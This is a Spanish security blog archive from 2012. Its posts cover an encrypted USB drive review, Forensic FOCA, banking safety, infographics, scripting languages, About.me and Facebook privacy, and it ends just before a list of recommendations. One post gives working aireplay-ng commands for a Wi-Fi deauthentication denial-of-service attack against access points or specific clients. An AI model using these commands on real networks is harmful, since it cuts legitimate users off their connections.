2012/03/13

Análisis de USB cifrado: Kingston DataTraveler 6000

Cada vez es más frecuente leer noticias en las que saltan las alarmas porque se hace público un gran secreto industrial o datos personales de clientes/usuarios que viajaban en un pendrive USB que ha sido extraviado. Normal que se pierdan, los hacen tan tan pequeños!!!

Uno de los consejos que solía dar siempre es que los datos sensibles que llevásemos en nuestro pendrive, fuesen en un contenedor cifrado. Para ello recomendaba herramientas como Truecrypt o Bestcrypt.

De esta manera, cada vez que queramos leer o escribir en la parte cifrada del pendrive, deberemos montar el contenedor con el software correspondiente. Esto implicará que si utilizamos el pendrive en un ordenador que no es el nuestro, habrá que llevar la versión Windows/Linux/Mac del software de cifrado correspondiente.

Desde hace tiempo, existe en el mercado diferentes modelos de pendrives USB que incorporan una partición sin cifrar, de sólo lectura, con software para montar un volumen interno que almacena contenido de forma cifrada.

El caso del pendrive que analizamos es el Kingston DataTraveler 6000, que cifra los datos con AES 256 y ECC. Para ello, incluye un chip que realiza de forma autónoma las operaciones criptográficas de cifrado. Además cumple la normativa FIPS 140-2 Nivel 3.

Al insertarlo en mi Mac, aparece el contenido de la partición de sólo lectura, con el software para Windows y Apple, así como un manual de usuario.



Al iniciar la aplicación para Mac, detecta que el pendrive nunca ha sido inicializado, y nos guía para ello.


Aceptamos el EULA


Introducimos una contraseña para acceso al dispositivo.


Dicha contraseña tiene que cumplir unos requisitos mínimos de complejidad... Hasta 128 caracteres!

 

Introducimos información de contacto para que si alguien se lo encuentra, me lo devuelva (ingenuo de mí...)


Una vez montada la partición cifrada aparece, además, el nuevo volumen.


Cada vez que lo tengamos que volver a montar, al ejecutar el programa de gestión para Mac, nos pedirá la contraseña que introdujimos.



Y por fin ya tenemos acceso a nuestras cositas confidenciales que nadie más debería poder ver si extraviamos el pendrive




Por otra parte, he querido comprobar el rendimiento del dispositivo, si lo comparamos con un contenedor cifrado con Truecrypt, contenido en un pendrive cualquiera. 

Para ello hice un dd de 1 GB del mismo fichero en ambos casos. Los resultados son los siguientes:

En un contenedor Truecrypt en un pendrive normal


dd bs=1024 count=1000000 if=./BT5R2-GNOME-64.iso of=/Volumes/NO\ NAME/algo_de_1_GB.iso
1000000+0 records in
1000000+0 records out
1024000000 bytes transferred in 96.499814 secs (10611419 bytes/sec)

En Kingston Datatraveler 

dd bs=1024 count=1000000 if=./BT5R2-GNOME-64.iso of=/Volumes/KINGSTON/algo_de_1_GB.iso
1000000+0 records in
1000000+0 records out
1024000000 bytes transferred in 175.302194 secs (5841342 bytes/sec)
Como se puede ver, incluso es bastante más rápido utilizar un contenedor Truecrypt que el pendrive autocifrado.

Como ventaja añadida al dispositivo Kingston, hay que decir que el dispositivo trae configurado, de fábrica, un sistema de autodestrucción de los datos si se introduce 10 veces una contraseña de desbloqueo incorrecta. De esta forma, evitamos ataques basados en fuerza bruta o diccionario que sí que son posibles (aunque dudo de su efectividad) en contenedores Truecrypt con herramientas como Passware Kit Forensic.

Estoy seguro que si Chema Alonso hubiera tenido custodiada la versión de la FOCA en uno de estos, no habría sufrido aquel "incidente de seguridad".

Si te ha parecido interesante podrías hacer click en +1, compartirlo en Facebook o Twitter, o dejar un comentario. ¡Gracias! 

2012/03/09

[Ataque DoS Wireless] Denegación de Servicio a una Red Wi-fi

El objetivo de una Denegación de Servicio a una Red Wi-fi es dejar a los usuarios legítimos de una red Wi-fi sin poder acceder a Internet, esto se logra inundando con paquetes de deautenticación al punto de acceso y/o al cliente.

Cuando se quiere realizar un ataque DoS a una Red Wi-fi, se puede atacar de 2 formas, una es atacando al punto de acceso y dejar sin acceso a ningún cliente o atacando solamente a un cliente en específico.

0.- Preliminar:
Primero ponemos la tarjeta de red en modo monitor:
airmon-ng start wlan0
Revisamos el canal del Punto de acceso y ponemos en modo monitor en ese canal en específico:
airmon-ng -c 5 mon0
Donde 5 es el canal del punto de acceso y mon0 es la interfaz en modo monitor.

1.- DoS al punto de acceso:
 Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) al Punto de acceso.
aireplay-ng -0 0 -a 99:99:99:99:99:99 mon0
Donde 99:99:99:99:99:99 es la mac del Punto de acceso.

 2.- DoS al Cliente:
 Con aireplay enviamos paquetes de deautenticación en un buncle infinito (-0 0) a un cliente en específico.
aireplay-ng -0 0 -a 99:99:99:99:99:99 -c 11:11:11:11:11:11 mon0
Donde 99:99:99:99:99:99 es la mac del Punto de acceso y 11:11:11:11:11:11 es la mac del Cliente.

Si esto no les pareció lo suficientemente fácil, Abdulla Aleid realizo un pequeño script que automatiza todo este proceso, pero es un poco más efectivo ya que envia solo 100 paquetes de deautenticación, pero con un loop infinito que sobrecarga aun más la red Wi-fi:


Demostración del funcionamiento del Script:




Fuente: http://www.blackploit.com

Forensic FOCA una herramienta que te ayudara en tus análisis forenses

Forensic FOCA http://www.informatica64.com/ForensicFOCA/ es un producto derivado de la conocida herramienta FOCA. Esta nueva edición está orientada a su utilización en escenarios de informática forense como indica su nombre.
Para dicha labor la herramienta analiza los metadatos de los ficheros existentes en una unidad de disco o una carpeta. Soporta una gran cantidad de documentos entre ellos los documentos de Microsoft Office, LibreOffice, PDFs y ficheros de imágenes. En su página http://www.informatica64.com/ForensicFOCA/ podéis ver una lista completa.
A continuación se muestra una imagen de la visualización por documento de Forensic FOCA:
clip_image002[4]
Imagen 1: Visualización por documentos
El último objetivo que tiene la herramienta es lograr crear un Timeline con todas las fechas halladas cómo por ejemplo la fecha de creación o impresión de un documento así cómo los usuarios que puedan estar asociados a un determinado evento. Con todo ello se obtiene una visualización cómo sigue:
clip_image003[4]
Imagen 2: Timeline
La aplicación permite filtrar por fechas, usuarios o tipos de eventos para filtrar los resultados y saber por ejemplo que hizo un usuario en un equipo durante un rango de fechas. Por último es posible exportar todos estos datos para su utilización o procesado.
Si deseáis probar Forensic FOCA podéis descargaos una versión totalmente gratuita desde su página web http://www.informatica64.com/ForensicFOCA/downloadTrial.aspx, está limitada a documentos .doc y .docx. También es posible adquirir una versión completa http://www.informatica64.com/ForensicFOCA/buy.aspx por solo 20 €.
Para mas información podéis acudir al manual de referencia de Forensic FOCA http://www.informatica64.com/ForensicFOCA/Manual/Manual.Espa%C3%B1ol.pdf .

2012/03/06

¿Cómo realizar en forma segura una operación bancaria por Internet?

Gonzalo Erroz, gerente de Ventas para el Sur de América Latina de Norton para Symantec, habló con iProfesional.com sobre la situación del ciberdelito, en especial el enfocado a las transacciones financieras, y las maneras de asegurar las operaciones bancarias realizadas a través de la Red.
En el mundo hay más de un millón de víctimas diarias por los ciberdelitos y casi 750 mil de ellas corresponden a países emergentes, como la Argentina, según indica un estudio de Norton, una de las marcas de Symantec, el mayor fabricante mundial de software de seguridad informática.
Por ejemplo, en enero pasado, Marcelo Toscano, dueño de Cereales Toscano S.A., fue víctima de hackers quienes le robaron 86.900 pesos de sus cuentas bancarias. De no existir un límite de extracción bancaria, podrían haberle robado más de 200.000 pesos.
A través de un virus troyano que se inserta en la PC de la víctima, los ciberdelincuentes pueden seguir los movimientos financieros de su víctima durante meses.
Luego, les toma entre 15 y 20 días poder descifrar la clave bancaria del usuario y cuando la obtienen actúan de inmediato.
El mismo estudio de Norton reveló que el ataque más común y más evitable sigue siendo el de los virus informáticos o malware, que representan el 58% de las incidencias en línea.
La consultora PriceWaterhouseCoopers (PWC) reveló en febrero que casi el 70% de los clientes bancarios en el mundo utiliza Internet para realizar operaciones financieras. Y que un tercio lo hace a través de la banca móvil.
“Se estima que para el año 2015 la principal interacción de los bancos con sus clientes será digital”, explicó PWC, en un estudio sobre banca digital, que incluye el análisis de los especialistas, las perspectivas del sector y los resultados de una encuesta en la que participaron aproximadamente 3.000 usuarios bancarios.
PWC indica que son los jóvenes quienes le dan mayor impulso al crecimiento del uso de los medios digitales: "La Generación Y está eligiendo por primera vez a su proveedor principal de servicios financieros. Como ésta representa un gran porcentaje de los clientes del presente y del futuro, los bancos deberían implementar estrategias innovadoras para atraerlos, como las ofertas digitales de calidad, que son preferidas antes que otras ventajas competitivas tradicionales, como la marca y la cercanía de las sucursales".
En este contexto, Gonzalo Erroz, gerente de Ventas para el Sur de América Latina de Norton para Symantec, habló con iProfesional.com sobre la situación del ciberdelito, en especial el enfocado a las transacciones financieras, y las maneras de asegurar las operaciones bancarias realizadas a través de Internet.

-¿Cuáles son los ciberdelitos más frecuentes en la Argentina?-Lo más común en cuanto a ciberdelitos se encuentra en las descargas de aplicaciones o acceso a links, a los que ingresamos por estar acompañados de un título que nos llame la atención o nos de curiosidad, o porque lo recibimos de una fuente al parecer confiable.
Los e-mails, la transferencia de datos y las transacciones bancarias son también actividades que se suelen ver muy afectadas por el cibercrimen, produciendo, sobre todo, el robo de datos personales y de identidad.

-¿Existe un crecimiento de los ciberdelitos vinculados a los sectores bancarios y financieros?-Por una cuestión de practicidad y seguridad los clientes de bancos comenzaron a volcarse cada vez más a los servicios “online”, sobre todo, en lo referente a transferencias bancarias.
El Registro de Direcciones de Internet para América Latina y el Caribe (LACNIC) señaló a finales del 2011 que este tipo de crímenes afectan a los bancos de América Latina ocasionando una pérdida anual de 93.000 millones de dólares, a lo que se suman 761 millones de dólares que son sustraídos de las cuentas de los clientes.
Según el último estudio de PricewaterhouseCoopers, correspondiente a febrero de 2012, el 46% de las empresas manifestó haber sido victima de un delito informático durante 2011.
En ese estudio participaron 3877 organizaciones de 78 países, de las cuales 77 de ellas pertenecen a Argentina.

-¿Cuál es el método o técnica que utilizan los delincuentes informáticos para cometer ciberdelitos bancarios y/o financieros?-El método más común es el “phishing”, donde se reciben mails de direcciones que parecen confiables, como páginas de bancos, con el mismo diseño y estilo de mensaje, donde se le pide como aliciente que verifique sus datos o los actualice.
Haciendo clic en un “link” que direcciona a otra página de aspecto idéntico a la conocida, se ingresan estos datos, dejando toda nuestra información confidencial al descubierto.
Por lo general, el mail llega de parte de alguien que previamente averiguó qué banco usa la persona y realizó un estudio de los hábitos de navegación de la víctima.

-¿Cuánto tiempo demoran en acceder a datos privados como nombre de usuario, contraseña o número de cuenta bancaria de la víctima?-El tiempo dependerá de la estructura que tenga en funcionamiento la organización cibercriminal.
Los datos se obtienen inmediatamente pero se usan en fechas de mucho consumo para poder pasar inadvertidos.
Una vez más se observa el grado de sofisticación de la agresión y su particularidad de pasar de ser un ataque general, como lo es la recolección de datos, a un objetivo que tiene que ver con un perfil de usuario particular donde ya fueron previamente estudiados sus costumbres y hábitos.

-¿Cuáles son los principales peligros que enfrentan hoy las operaciones bancarias y financieras por Internet?-El principal peligro para las operaciones bancarias y financieras por Internet es el descuido de los datos personales.
Gran parte de las transacciones bancarias están protegidas pero no sucede los mismo con los datos de quien hace la transacción.
Una operación bancaria hecha de manera satisfactoria no es más que un hecho doméstico en cierto modo. El desafío es el de mantener a salvo nuestra identidad online.

-¿Qué recaudos hay que tener en cuenta antes de realizar una operación bancaria y/o financiera por Internet?-Es muy importante siempre tomar las medidas de prevención necesarias cuando se trata de nuestra información privada.
Estar siempre actualizado y contar con las herramientas de ayuda nos permite confiar en los sistemas. Muchas veces los ataques resultan de pequeños errores cometidos por desinformación o falta de cuidado.
Es  recomendable utilizar contraseñas complejas y únicas para cada sitio, como la combinación de letras mayúsculas y minúsculas, símbolos y números.
Cuando la persona realice transacciones bancarias debe asegurarse de que la conexión Wi-Fi sea confiable y no de acceso público.
Además, es importante contar con una protección de antivirus que lo resguarde de gusanos, software espía, robo de identidad, “phishing”, “spam” y “key readers” entre otros.
Un buen antivirus le permitirá estar seguro sobre la información que recibe y la seguridad de los sitios en los que ingresa.

Si te ha parecido interesante podrías hacer click en +1, compartirlo en Facebook o Twitter, o dejar un comentario. ¡Gracias!

2012/03/05

Diez infografías sobre ciber-seguridad

Del blog de Q1 Labs nos llega un TOP 10 de infografías de seguridad informática que también queríamos compartir con vosotros. De igual forma os animo a que comentéis esta entrada si conocéis alguna más (sobretodo si es en español).
Sin más, os dejo con la mencionada lista:
1) La evolución del SIEM modernoRepresentación del cambio al que se ha visto sometido la tecnología SIEM para evolucionar a una Seguridad Inteligente.
The Evolution of Modern SIEM
2) 8 nivels de Seguridad TIEn un mundo de virus, malware y hackers, la seguridad de la información es vital. Un único método de seguridad TI no puede asegurar la protección de los datos críticos.
8-levels of IT Security

3) Un apunte sobre las amenazas informáticas: La propagación de las infecciones de virus de software y de las estafasRepresenta la creciente amenaza en el ciber-paisaje actual, incluido los virus, brechas de seguridad, estafas de phishing y más.
Computer Security Threats Infographic
4) Infografía que resume la noticia del escándalo mundial del hacking telefónico
La infografía titulada "La noticia del escándalo: la historia que destruyó un periódico de 168 años" ofrece un calendario detallado con los eventos fundamentales, los personajes clave y las brechas tecnológicas que destruyeron una publicación de 168 años de antigüedad.
Infographic Summarizes the News of the World Hacking Scandal
5) Seguridad TI y el coste de las brechas de seguridad
Hay una serie de herramientas para luchar contra la negligencia, incluida la educación, la ejecución de las mejores prácticas y la vigilancia. Más difícil aún es aumentar la protección de datos en medio de la oleada de ataques maliciosos provenientes de dentro y fuera de la organización...
IT Security & The Cost of Breaches
6) Una breve historia sobre el hacking
El hacking se ha convertido en mucho más que una palabra que se trasladó del diccionario pseudo-urbano al real, es parte de una descripción del trabajo que podría estropear el mundo en un instante... La historia visual de OnlineMBA.com también cuantifica daños.
A Short History on Hacking
7) El coste de la seguridad de los datos
Pragmatix presenta una infografía en la que se ven las consecuencias financieras de las fugas de datos.
The Cost of IT Security
8) ¿Por qué los líderes del gobierno se centran en la seguridad cibernética?
CyberThreat_US es una nueva serie de OhMyGov que trata los temas de ciberseguridad más urgentes a los que se enfrenta el gobierno de los EE.UU.
Why the federal government is focused on cyber-security
9) La brecha de seguridad de PSN
¿Cuánto daño financiero han causado este año los ataques a Sony? Los números siguen aumentando, pero esta nueva infografía describe la cadena de acontecimientos que han llevado a que la información de millones de usuarios de PSN se vea comprometida.
The PSN Security Breach
10) Ataque hacker: Los ataques de Lulzsec y las estadísticas de seguridad
Este año ha contemplado el surgimiento de grupos de hackers ante la mirada pública, grupos como Anonymous y Lulzsec han violado la seguridad de algunas de las marcas más importantes del planeta.
Hack Attack:  Lulzsec All You Need to Know

Scripts de seguridad: ¿Qué lenguaje elegir?


Surge una necesidad: hay que automatizar una labor para, dada una entrada, procesarla y generar unos resultados. ¿Cómo lo implemento para que sea un ordenador quien lo haga por mí? ¿Qué herramientas puedo utilizar para ello?

Dar una solución a esa necesidad es algo que, después de un rato de meditación, seréis capaces de pre-planificar mentalmente, ayudados de boli y papel si fuese necesario, plasmando el resultado en una pantalla con fondo negro. Ahora bien, ¿qué lenguaje de programación utilizaréis?

Para los lectores de Security By Default que no conozcan RootedCon, decir que es uno de los Congresos de Seguridad más importantes que se llevan a cabo en España, en el que además, este año fuimos ponentes mis compañeros Jose Antonio Guasch, Yago Jesús y el que escribe este artículo.

Entre las diferentes charlas, en las que se presentaban el resultado de investigaciones, herramientas, descubrimientos, etc,… creo que fue Juan Garrido "Silverhack" (al cual tengo en gran estima) quien indicó primeramente que para la codificación de lo que necesitaba, utilizó BATCH y Powershell; Lord Epsylon indicaba que la herramienta XSSer estaba escrita en Python; Raul Siles de Taddong hablaba de Java como lenguaje elegido; Pablo San Emeterio usaba C; y yo, Lorenzo Martínez, me decantaba por Perl y C++ para la realización y ejecución de mis scripts.

Por Twitter, y con el hashtag #rooted2012, encontraréis varias referencias y chistes sobre las preferencias de cada uno, por el lenguaje de scripting más adecuado.

Así pues, me gustaría contaros mi experiencia en los diferentes lenguajes, y cuál elegir en cada ocasión. He de distinguir entre lenguajes de programación y lenguajes de scripting. En mi opinión, un lenguaje adecuado para "scripting" es aquel que es interpretado, mientras que un lenguaje compilado se usa normalmente para el desarrollo de herramientas en los que el rendimiento es vital.  
  • ASM (80x86, Micropics 16F84) -> Si lo que se requiere es un rendimiento insuperable, cuanto más nos acerquemos a lo que "entiende" el procesador, mejor. En algunos procesadores, como los micropics 16F84, cuando los usaba en la Universidad, no había más remedio que hacerlo con el reducido juego de instrucciones soportadas en su ensamblador. Reservadlo para procesos críticos de alto rendimiento.
  • C/C++ -> Yo diría que es el lenguaje que está en el centro de gravedad entre rendimiento/sencillez de programación. Imprescindible para el desarrollo de herramientas que tengan requisitos de velocidad pero que permita entender de un vistazo, el código fuente, a casi cualquiera.
  • Pascal -> De los primeros lenguajes que aprendí en la Universidad. Más sencillo de entender, que C/C++, pero no goza de tanta popularidad.
  • JAVA -> Es un lenguaje híbrido (compilado e interpretado). Como ventaja, es multiplataforma. Como lenguaje pseudo-interpretado, es multiplataforma, aunque requiere precompilación. Como ventaja, hay una amplia comunidad de desarrolladores que ponen a disposición del mundo, librerías multipropósito.
  • Batch/Shell scripting -> Lenguaje interpretado. Dependiente del sistema operativo (Windows / *NIX) Se utilizan desde tiempo inmemorial como complemento para la realización de diferentes tareas, ejecutables por línea de comandos o de forma programada por el propio sistema operativo. Útiles para gestión de ficheros (copia, borrado, cambios de permisos y movimiento a diferentes ubicaciones), llamadas a otros ejecutables, cambios de permisos, etc,… Además provee lo necesario para estructuras condiciononales, bucles, etc,… Bajo mi punto de vista, el límite es que sólo se pueden realizar llamadas a comandos del propio sistema operativo, sin poder reutilizar módulos creados por otras personas, como sucede con otros lenguajes.      
  • Perl -> Lenguaje interpretado, inicialmente diseñado para el procesamiento de ficheros de texto. El propio lenguaje está hecho sobre lenguaje C. Hay una gran variedad de módulos disponibles en la comunidad CPAN. Se puede encontrar de todo: desde módulos .pm que interactúan con un módem, hasta otros que lo hacen con una estación meteorológica, para tratar con la API de Twitter, Facebook, bases de datos, threads, gestión de sockets, implementaciones de algoritmos de cifrado… y un muy muy largo etcétera… Desde hace unos años, es mi elección estrella para el desarrollo de cualquier tipo de script. Las causas sobre todo son su sencillez,  los mínimos requisitos en la sintáxis y porque gracias a posibilitar la creación de scripts en modo "Quick & Dirty", permiten generar un script express con muy pocas líneas de código, para hacer realidad la solución a cualquier problema, con un grado de abstracción y alto nivel que no he visto en otros lenguajes.

Otros lenguajes de scripting interpretados en los que NO he programado: Los más conocidos son Python o Ruby por ejemplo. Me guste más o menos, por lo que he visto en los últimos años, Python es definitivamente el "lenguaje de scripting de moda". Según tengo entendido (y por lo que he podido ver), es también un lenguaje sencillo de aprender, que permite realizar scripts muy potentes con una alta abstracción. En mi caso, los problemas que he tenido con python han tenido que ver, fundamentalmente, con la compatibilidad hacia atrás entre scripts hechos en Python 2.6 al ejecutarse en CentOS Linux 4.X, con la última versión de python disponible 2.3. Por otra parte, Python tiene ciertos requisitos sintácticos más exigentes que en Perl. Desconozco Ruby absolutamente, por lo que no me pronunciaré al respecto.

Efectivamente, hay muchos más lenguajes, como .NET, PHP, COBOL, Javascript, Visual Basic script, Modula, LUA, LISP, etc, etc,… que o no he tenido oportunidad de utilizar, o sólo me han valido para aplicaciones web, o quedaron olvidados en mis épocas universitarias, por lo que, o tampoco creo poder valorar actualmente con propiedad, o simplemente no puedo considerarlos útiles para scripting.

Al margen de las risas que existieron en la última edición de la Rootecon, respecto a qué lenguaje es mejor, creo que como siempre cabe aplicar la lógica. Si todos estos lenguajes siguen vivos, es porque hay legiones de desarrolladores que siguen utilizándolos de una forma diaria, enriqueciéndolos con módulos compartidos para el uso y disfrute de la Comunidad. Lo que digo aquí no implica que un lenguaje sea mejor que otro, sino que si dominas varios, puedes valorar y elegir cuál utilizar en cada ocasión. 

Dependiendo del problema a solucionar, de las necesidades de rendimiento a satisfacer y de la existencia o no, de módulos y librerías ya hechas, dependencias necesarias, y la no necesidad de matar moscas a cañonazos, puede que resulte más interesante pararse a pensar que lenguaje elegir antes de abrir el editor. 

Si lo que se necesita hacer puede llevarse a cabo en cualquier lenguaje, creo que la decisión ha de ir guiada por el lenguaje en el que nos sintamos más cómodos desarrollando.

En cualquier caso, elijáis el lenguaje que elijáis, no os olvidéis de lo más importante de cualquier script: Los comentarios que expliquen las secciones más complejas, para que otros (e incluso vosotros mismos) podáis entender de una forma rápida su funcionamiento.

Happy scripting!

About.me: cómo hacer tu currículum online

Las tarjetas de presentación son herramientas muy útiles para compartir con clientes y colegas de manera efectiva información personal para darnos a conocer en un momento determinado. Quiénes somos, nuestra profesión y la forma en que podemos ser contactados, son básicamente los datos que encontramos en la mayoría de ellas, además tienen la ventaja de ser muy fáciles de transportar y distribuir.
La comúnmente denominada Web 2.0 abrió la puerta a un gran número de servicios útiles e interesantes, que en combinación con métodos más tradicionales nos permiten aprovechar al máximo el mundo virtual, en la vida real. Uno de esos servicios es precisamente About.me.
About.me vio la luz en diciembre de 2010 y gracias a las expectativas generadas, fue adquirido por AOL Inc. pocos días después. En palabras sencillas, About.me es un servicio que nos permite crear una página de perfil personal, a la que podemos conectar todas nuestras cuentas en redes sociales, blogs y sitios webs personales, con lo que tendremos una tarjeta de presentación en línea para incluir información que por cuestiones de espacio, obviamente no entrarían en una tarjeta tradicional. La interfaz sencilla y amigable del sitio nos permitirá configurar un perfil completo en cuestión de unos minutos.

Creando una cuenta en About.me

  1. El primer paso para poder configurar nuestra tarjeta de presentación en línea es darnos de alta en el servicio, para eso nos dirigimos a About.me e ingresamos nuestra dirección de correo electrónico, seleccionamos una contraseña para la nueva cuenta y por último, pero no menos importante escogemos la URL que usaremos para nuestro perfil, sería algo tipo http://about.me/tunombre. La mayoría de usuarios usan una combinación de su nombre y apellidos e incluso seudónimos. La idea es elegir un nombre que se lea profesional, no como aquellos nombres de usuario que usábamos en nuestras cuentas de correo cuando teníamos 11 años.
  2. Lo siguiente será ingresar nuestro nombre y apellido, una biografía y escoger algunas etiquetas para identificar aquello a lo que nos dedicamos. En la biografía podemos resumir en un par de párrafos lo que nos gusta hacer, nuestras habilidades, intereses y también aquellos que nos llevó a convertirnos en lo que somos ahora. Las etiquetas sirven para que otras persona puedan encontrarnos de manera más fácil, elige bien e ingresa las que mejor funcionen para ti. Utilizar habilidades e intereses como etiquetas suele servir.
Con esto habremos terminado el proceso de registro, ya podemos pasar a configurar y personalizar nuestra tarjeta de presentación.

Personalizando nuestro perfil

En este momento nuestro perfil ya está en línea, ahora debemos personalizarlo para dar una buena impresión a nuestros visitantes.
  1. Lo primero es seleccionar una buena imagen de fondo, podemos usar cualquiera, pero como en About.me todo es acerca de ti, lo ideal es que uses tu mejor fotografía, si puedes ajustarla a un tamaño de 1680x1050 píxeles mucho mejor.
  2. Si omitimos la biografía durante el proceso de registro o si queremos modificar algo en ella, este es el momento. En caso contrario vamos al siguiente paso.
  3. Ahora vamos a elegir los colores que darán vida a nuestro perfil. Tenemos la opción de asignar un color para el fondo de la página, uno para el fondo de la caja que contiene nuestra información, a la que también podemos configurar una transparencia y los colores del texto para nuestro nombre, el encabezado, la biografía y los enlaces.
  4. En este paso podemos seleccionar el tipo y tamaño de fuente de los diferentes textos que aparecen en nuestro perfil. Encontraremos alrededor de 40 tipografías distintas, por lo que no debe ser problema elegir una que nos guste. A medida que hacemos ajustes, los cambios se dejan ver automáticamente en la página, así que podemos jugar con los valores hasta encontrar la combinación que más nos agrade.
  5. Llegamos al paso final, conectar nuestro perfil de About.me con otros servicios, la idea de esto es ofrecer a nuestros colegas, potenciales clientes y otros usuarios, canales de comunicación alternativos, bien sea a través de correo electrónico, Twitter, Facebook, mostrar nuestras fotos en Flickr o gustos musicales a través de Last.fm. Hay más de 20 servicios por defecto y la posibilidad de agregar URLS manualmente para el caso de nuestros blogs, sitios webs personales, portafolios profesionales etc.
De esta manera hemos terminado de personalizar nuestra tarjeta de presentación y es hora de mostrarla al mundo.
Extra: Si necesitas inspiración antes de construir el tuyo, puedes encontrar mucha en otros perfiles ya existentes, a través del directorio de About.me, la mayoría son realmente espectaculares.

Consejos para dar a conocer nuestro perfil

Nuestra nueva tarjeta de presentación virtual está lista para ser distribuida, y hacerlo es muy sencillo, basta con compartir la URL que creamos al principio http://about.me/tunombre en la mayor cantidad de lugares posible, por ejemplo:
  • Usarla como parte de nuestra firma en los correos electrónicos. Servicios como Gmail y Hotmail nos permiten configurar una firma por defecto que se adhiere automáticamente al final de cada email que enviamos. Si hacemos esto cada persona que reciba un correo nuestro tendrá un enlace directo a nuestra tarjeta de presentación.
  • Los perfiles que mantenemos en redes sociales como Facebook, Twitter, Google+, etc nos permiten asignar una URL como parte de nuestra información personal. Si aprovechamos este espacio con nuestra dirección de About.me estaremos de alguna manera conectando todas nuestras redes entre sí.
  • ¿Quién no usa servicios de mensajería instantánea? Google Talk, Windows Live Messenger, Yahoo Messenger y servicios como Whatsapp nos permiten establecer mensajes de estado personalizados, otra excelente manera de compartir nuestra URL.
  • Imprimir la URL de nuestra tarjeta de presentación en línea en las tarjetas tradicionales, de esta manera estaremos llevando mucha más información en el mismo “trocito de cartón”.
  • Otra forma ingeniosa es crear un código QR con nuestra URL y aprovechar la ventaja de los teléfonos inteligentes para leerlos. De hecho, About.me permite generar tarjetas de presentación tradicionales que incluyen este código, incluso en este momento están regalando un paquete de estas para los nuevos usuarios registrados, solo debemos cubrir los gastos de envío.
Finalmente, el propio servicio nos ofrece estadísticas completas sobre las visitas que recibe nuestro perfil, el sitio donde se originaron, la cantidad de clics que se han hecho sobre cada uno de los otros servicios que tengamos configurados y muchas más. De esta manera podemos comprobar la efectividad de nuestra tarjeta de presentación en línea como herramienta para darnos a conocer.

http://about.me/cgtedgar

2012/03/03

Facebook: 5 consejos para estar protegidos

5 consejos para estar protegidos en Facebook
En Facebook se encuentran más de 850 millones de usuarios dispersados alrededor de todo el mundo y es una plataforma social donde se interactúa compartiendo videos, fotografías, frases que contemplan el estado de ánimo, las actividades diarias, incluso datos personales y privados. Para mejorar nuestra protección, debemos tener en cuenta algunas recomendaciones que se enfocan a nuestra privacidad.
Facebook presentó sus propias recomendaciones durante una conferencia y estas sugerencias se enfocan tanto a adultos como adolescentes por igual. Las recomendaciones fueron compartidas por el sitio AllFacebook y deseamos que lo tengas en cuenta y lo compartas. Debemos recordar que estas recomendaciones nos ayudarán a evitar pasar por malos ratos ya sea robo y usuarpación de identidad, acoso cibernético y más.

1. Promover la conciencia sobre la seguridad
Ayude a aumentar la conciencia acerca de cuestiones relacionadas con la seguridad, tanto mediante la publicación en su propia página y discutir el tema en línea.
2. No tolera los abusos
Crea o apoya políticas claras que no toleran el acoso o el abuso en Facebook. Si usted es un padre, haga de esto una regla de la casa. Si usted está administrando una página en la red social, subir a tal efecto en el subsitio. Si usted es un usuario individual, escriba una nota o actualización de estado acerca de esto.

3. Notificar abuso a Facebook
Anima a la gente a utilizar en forma incorrecta las opciones -informar de abusos- enlaces en el sitio y las aplicaciones de terceros. Dile a la gente acerca de esto en persona y también escribe sobre estos enlaces en su página o perfil. Muchas personas no se dan cuenta de estos enlaces, mientras que el uso del sitio, pero podría ser hallado en busca de ellos en el futuro.

4. Comparte consejos de seguridad
Hable con gente que conoces acerca de cómo utilizar el sitio con mayor seguridad. Haga esto en el sitio y fuera de línea también. Por ejemplo, habla de lo que es una mala idea para compartir su contraseña con otras personas, cómo se tiene que evitar compartir información en línea y se esfuerzan por mantener la privacidad en su lugar, ¿cuál de las opciones de privacidad para su uso en diferentes situaciones, y si se unfriend gente que no conoces bien.
5. Examine los recursos educativos
Buscar recursos educativos sobre cómo utilizar Facebook de forma más segura y compartirlos con otros. El centro de la red social de seguridad oficial tiene información sobre esta publicado en la página, y las organizaciones participantes también tienen datos similares publicados en sus páginas respetados.

2012/03/01

Seguridad TIC en las PYMES: uso indebido de las infraestructuras

El uso indebido de las infraestructuras TIC en las empresas se ha convertido en una de las amenazas más importantes para la seguridad para su actividad.
El abaratamiento del acceso a Internet, la proliferación de las redes sociales o las tecnologías móviles, ha traído consigo un enorme crecimiento del consumo de contenidos digitales, una consecuencia de los cambios que se han producido en los hábitos de los usuarios, que pasan cada vez más tiempo navegando en Internet, consultando información, o realizando compras on-line, muchas veces, independientemente del entorno en el que se desarrollen esas actividades y es esto último lo que está suponiendo un problema para las empresas. Estas ven como sus empleados, de forma cada vez más habitual, utilizan parte de su tiempo de trabajo para actividades que no están relacionadas con su actividad profesional o cómo llevan a cabo un uso poco adecuado de las infraestructuras que estas ponen a disposición de sus trabajadores para el desempeño de su actividad.
Hasta hace unos años las medidas de seguridad que implementaban las empresas, iban enfocadas sobre todo a la protección contra las amenazas externas, cuyo origen está en Internet, como los accesos no autorizados, los troyanos o el correo basura. Pero hoy día, este planteamiento ha cambiado, hasta el punto de que las amenazas que provienen del interior de las empresas y las organizaciones se consideran, en algunos casos incluso más importantes, sobre todo por las consecuencias que pueden ocasionar al originarse en propio corazón de las organizaciones y las empresas.
El uso inadecuado de las infraestructuras tiene muchas formas, como las que indicamos a continuación:
  • Descarga y visualización de contenido no relacionado con la actividad.
  • Uso de redes de intercambio de ficheros (P2P).
  • Uso del correo electrónicodel trabajo para enviar y recibir correos personales.
  • Envío de información confidencial a través del correo electrónico personal o de otros servicios de Internet.
  • Uso inadecuado de soportes de almacenamiento.
  • Sustracción o pérdida de información confidencial de la empresa.
  • Acceso a redes sociales y uso de programas de mensajería instantánea durante el horario de trabajo.
  • Utilización de teléfonos u ordenadores personales para el acceso a recursos y servicios de la empresa.
El uso indebido de los recursos e infraestructuras que pone la empresa a disposición de sus empleados, se ha convertido en una de las principales causas de incidentes de seguridad, en ocasiones con consecuencias desastrosas, pero también, es un problema que impacta muy negativamente en la productividad. Afortunadamente, las empresas cuentan con diversas herramientas y mecanismos para limitar el uso indebido de las infraestructuras y minimizar las consecuencias.
Desde INTECO-CERT, proponemos una serie de recomendaciones destinadas a luchar contra este problema, cada vez más presente en las empresas y en cualquier organización. Las citamos a continuación:
